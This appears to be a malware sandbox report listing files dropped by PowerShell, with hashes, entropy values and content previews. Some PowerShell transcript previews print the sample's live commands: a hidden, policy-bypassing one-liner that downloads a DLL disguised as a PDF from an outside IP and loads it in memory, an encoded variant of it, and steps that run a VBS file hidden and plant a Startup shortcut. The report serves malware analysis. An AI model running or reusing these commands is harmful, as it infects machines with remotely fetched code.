                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dgawbhw.o05.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5saywipd.men.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu4y3ysi.wmb.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnxlvzx1.xhq.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzbo1jkc.hpz.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iplajpvg.nby.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laq4ftm4.4mp.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmjsncm.0lo.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfeyzexk.3oy.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy35pvwd.ng5.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdtgx0ab.jx5.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\203a5f290b65cc8e.customDestinations-ms (copy)

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5300
                        Entropy (8bit):3.9668378984580555
                        Encrypted:false
                        SSDEEP:48:uLFkk6lg693WL5sCEMXMCwBEKus8gTot8kuSogZoicgTot8kuSogZoGH:yqT93IsCVMCwBCJjZH0jZHL
                        MD5:4EE1CA623146596B8B2FE0CC668DF4BE
                        SHA1:F4F45194F77EB837D180B34F1C9FCFD2AE0CD59B
                        SHA-256:9C918CFB6F2E04A7CB0F797B81D8DAC6A5FE6311D8D4ADCDE4BE69902E31F050
                        SHA-512:3A9F2192DA54BA2D7F03D83FFC0BC642A642B44FDCC2935A80D48819621B20D1333FCCE4DB858CCA8AB6925CCE9C9B5F5E7530A5045DE1D4869C4D56321553BF
                        Malicious:false
                        Reputation:unknown
                        Preview:...................................FL..................F. .. ....t>.Ir...'O.Ir....[.Ir..e.........................:..DG..Yr?.D..U..k0.&...&...........-....r..3..I._.Ir......t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..T.!.....Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..T.!.....Y....................f...R.o.a.m.i.n.g.....\.1.....>Qbu..MICROS~1..D.......NM..T.!.....Y.....................!Z.M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......NM..T.!.....Y..................... ..W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..T.!.....Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..T.!.....Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......T.!..Startup.h.......NN..T.!....................>.....Q.=.S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.....b.2.e....T.! .notepad.lnk.H......T.!.T.!..

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCYMZUG86WIB33RE6HLM.temp

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5300
                        Entropy (8bit):3.9668378984580555
                        Encrypted:false
                        SSDEEP:48:uLFkk6lg693WL5sCEMXMCwBEKus8gTot8kuSogZoicgTot8kuSogZoGH:yqT93IsCVMCwBCJjZH0jZHL
                        MD5:4EE1CA623146596B8B2FE0CC668DF4BE
                        SHA1:F4F45194F77EB837D180B34F1C9FCFD2AE0CD59B
                        SHA-256:9C918CFB6F2E04A7CB0F797B81D8DAC6A5FE6311D8D4ADCDE4BE69902E31F050
                        SHA-512:3A9F2192DA54BA2D7F03D83FFC0BC642A642B44FDCC2935A80D48819621B20D1333FCCE4DB858CCA8AB6925CCE9C9B5F5E7530A5045DE1D4869C4D56321553BF
                        Malicious:false
                        Reputation:unknown
                        Preview:...................................FL..................F. .. ....t>.Ir...'O.Ir....[.Ir..e.........................:..DG..Yr?.D..U..k0.&...&...........-....r..3..I._.Ir......t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..T.!.....Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..T.!.....Y....................f...R.o.a.m.i.n.g.....\.1.....>Qbu..MICROS~1..D.......NM..T.!.....Y.....................!Z.M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......NM..T.!.....Y..................... ..W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..T.!.....Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..T.!.....Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......T.!..Startup.h.......NN..T.!....................>.....Q.=.S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.....b.2.e....T.! .notepad.lnk.H......T.!.T.!..

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed Apr 11 22:35:26 2018, mtime=Sat May 28 03:15:32 2022, atime=Wed Apr 11 22:35:26 2018, length=447488, window=hidenormalshowminimized
                        Category:dropped
                        Size (bytes):1637
                        Entropy (8bit):4.44237717642267
                        Encrypted:false
                        SSDEEP:24:8zCdf2+ir/56UcKknpkWvAmW7d1+/CWl+/CWt+/CWLZUotUMkWjSsVAeL7aB6m:8zcgTotnH4eAmBtHLSs+B6
                        MD5:97C0003F1386137CE5B5A88C78877B92
                        SHA1:3051F4877F9B59E3075F7ADF1FD6D352CCCFBBD1
                        SHA-256:EDC77F05CEE29BB03A4962E9274A4DA82F3740C4A558E80AC590AE0AE52E05F5
                        SHA-512:A88239755DD9DFF241A1D870E812BD549EABA46AB6792FDD975E4C8672055D72EBB6B174C97D9D4E08F22F61F96DEEDF51062A7714AF8802917BF2FC1D09295F
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.... ...@v......>.o.Ir..@v...................................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T.!...........................\..W.i.n.d.o.w.s.....Z.1.....hT....System32..B......L...T.!.............................S.y.s.t.e.m.3.2.....l.1......L...WINDOW~1..T......L..T.!....W.......................a.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.....N.1......L.I..v1.0..:......L..T.!....X......................Rr.v.1...0.....l.2......Ln. .powershell.exe..N......Ln..T.!....d...........t..........i..p.o.w.e.r.s.h.e.l.l...e.x.e.......h...............-.......g............h.......C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe....M.i.c.r.o.s.o.f.t.Q.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.9.C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e..

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.1eplhr3P.20220527211616.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3126
                        Entropy (8bit):5.5003832136670905
                        Encrypted:false
                        SSDEEP:96:BZO/qNTuTjE6/H5ZNa5T2qDo1Z2uTjE6/H5ZNa5TXZl:RgjEcH5ZNCTtgjEcH5ZNCTj
                        MD5:05A8E03B74BB9D5A26DAA04FD092265D
                        SHA1:8BAA1C9E75EBCC28C8F9A5EA9D5F8D1D0A2CD215
                        SHA-256:E224093397680695878F908122C006C79419C0B4D299A93442E555AFEC13BCB1
                        SHA-512:735C740A3E25839219F0230C76644FC60463DBCEE628611BF59A5ADA51F830F77AB446E1CD8DCE03099520CBAFD1B9810B01AF320B503838A990638514EB5B94
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG...ANgA0AFMAdAByAGkAbgBnACgAKABOAG...AdwAtAE8AYgBqAG...AYwB0ACAATgBlAHQALgBXAG...AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD...ALQAyADAAMgAyAC0A...wB0AGEAcgB0AF...AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG...AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlA

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.6BQNrnBR.20220527211548.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1167
                        Entropy (8bit):5.156686585476039
                        Encrypted:false
                        SSDEEP:24:BxSA1CDvBBRcZx2DOXUWcPWRw0cZWMHjeTKKjX4CIym1ZJXgWWRw0cxnxSAZ7:BZ1av/qoOjw0hMqDYB1ZO7w0UZZ7
                        MD5:A96029F1E5D175C42D62DDFD4A44145B
                        SHA1:6252A1C046CEC5811C71662EA9A92AADAF12E6B6
                        SHA-256:2E84A48FCD30A5356DDF45E2ED33054A28D7685FBE070B5FF1189D4E85AD1D60
                        SHA-512:71B76A36CBF7E21ABB55D92E39687CB81655B6DE8E8D2C4643194E64F984D9723585E56A558A75582865E6BA0032D1DBCC45BF4AFF35FA45208962BFB9B60EB3
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211549..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs..Process ID: 6936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527211549..**********************..PS>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs....**********************..Command start time: 20

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.QizwF1Bj.20220527211550.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):953
                        Entropy (8bit):5.020318496685209
                        Encrypted:false
                        SSDEEP:24:BxSA/DvBBRcZx2DOXUWR3W5HjeTKKjX4CIym1ZJXbBnxSAZ8R:BZLv/qoOxm5qDYB1ZF1ZZ8R
                        MD5:38119CE1FDC7C0E605FD088B36D854D2
                        SHA1:3C531EE3B30E631E446DAF2D6CE91E642680B409
                        SHA-256:4876ED44FE3E14B9112945AE1F4A34700D21287135B62A17630512B75A6D086E
                        SHA-512:92A38B147A3112214A55D27AB805D7C7B1EAF4DFFFD8A4E23ABBDB59DEAF6235689E59F92D4808284528EBF4C682090A659A236D16903E4B893E786C342A030B
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211553..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5..Process ID: 1288..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527211553..**********************..PS>Start-Sleep 5..**********************..Command start time: 20220527212105..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220527212105..**********************..

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875._396rmPr.20220527211537.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1043
                        Entropy (8bit):5.097399204501104
                        Encrypted:false
                        SSDEEP:24:BxSA8DvBBRcZx2DOXU2RypaNWfHjeTKKjX4CIym1ZJXXpa8nxSAZ3:BZIv/qoOREZfqDYB1Zj/ZZ3
                        MD5:07418EAD77CF2795355B186422B579F1
                        SHA1:E0EC2B21FFBA5CA9D292F7576D9CFC5DC4094EC9
                        SHA-256:36A5C0D9ACD9CFF5FB40F2AEC9D28DDE6BB20D4EE6C5BB7F2676B047732D30DE
                        SHA-512:6B32AA8C26252D3C11780639139C22AECA7495BDFA468EDBE39FDC66E8D9634B441A231465197A0319D420D9DB9FF341A897AA948B25EB3BD101A0F94E9D97BE
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211538..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs..Process ID: 6508..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527211538..**********************..PS>Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs..**********************..Command start time: 20220527211730..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End tim

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.bfCcr7J2.20220527211526.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1572
                        Entropy (8bit):5.547408889785274
                        Encrypted:false
                        SSDEEP:48:BZKv/qoO23ukQ79qDYB1ZYd3ukQoIZZKi:BZW/qN2kZqDo1ZuktZx
                        MD5:B94EB89C3A2E551A96FA498C541EBE07
                        SHA1:2E9E2594741F56B8391A691C21D8C00801535E17
                        SHA-256:03C8EC35D35FA623FB81E1AAA1687E0448187777319531221D28964D6A367E41
                        SHA-512:906D1C1D119B86162D7917D8F903D7E1A632B604AEE56063E486054E75D9B72F7D26B88E23E32E39F5E43E748208F0A2D20BC10A3A70F87FCEC68286CBE94BE9
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211529..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command [Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))..Process ID: 6384..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.hz5nZdhI.20220527211619.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1572
                        Entropy (8bit):5.537347620641668
                        Encrypted:false
                        SSDEEP:24:BxSA1DvBBRcZx2DOXUWNDcKC2qcLYq+3QYWWHjeTKKjX4CIym1ZJXVKC2qcLYq++:BZNv/qoO23ukQ7WqDYB1ZD3ukQOzZZ83
                        MD5:A029A356BA2F881CFBFA3E10D281A7D5
                        SHA1:AB191DDF471CA4B0B9C85196116C1680D58C6F69
                        SHA-256:009504D5212B1909082F90CE43047B0F5A7BE4552B6E55836833D9767F5FC92B
                        SHA-512:6EB7AF3212095A8119B8E6F1D449467347BAC1C9A1386AAB5E5E657D507C71C0A34C2D3C9E8EC153A87AC95E15F2341196648ABE6A28BDC88655377A919DFF1F
                        Malicious:false
                        Reputation:unknown
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211623..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command [Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))..Process ID: 6516..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command

                        C:\Users\user\Documents\20220527\PowerShell_transcript.783875.zMIa0yAZ.20220527211523.txt

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3126
                        Entropy (8bit):5.49970633828668
                        Encrypted:false
                        SSDEEP:96:BZ5/qNTuTjE6/H5ZNa5TVqDo1ZDuTjE6/H5ZNa5T2ZC:ygjEcH5ZNCTvgjEcH5ZNCT5
                        MD5:55EE112D303F24C83D7EF1FCB5E67A77
                        SHA1:345CCC1E60D9A747BDF847DF4152DBF9518A9B31
                        SHA-256:A827F2C2557C326C8B76509268541280C3C6392E4FE9B647D929EA0A465B1723
                        SHA-512:DF4C4F4A85F0C72B2660AB42233FC9DCCAE8DFF7E35472EC87C92C245CA2651BAC6451E6B0D6182094C6378BFA7CD33A47D920FF4AFBA5D0A483C3BFAB65A735
                        Malicious:false
                        Reputation:unknown
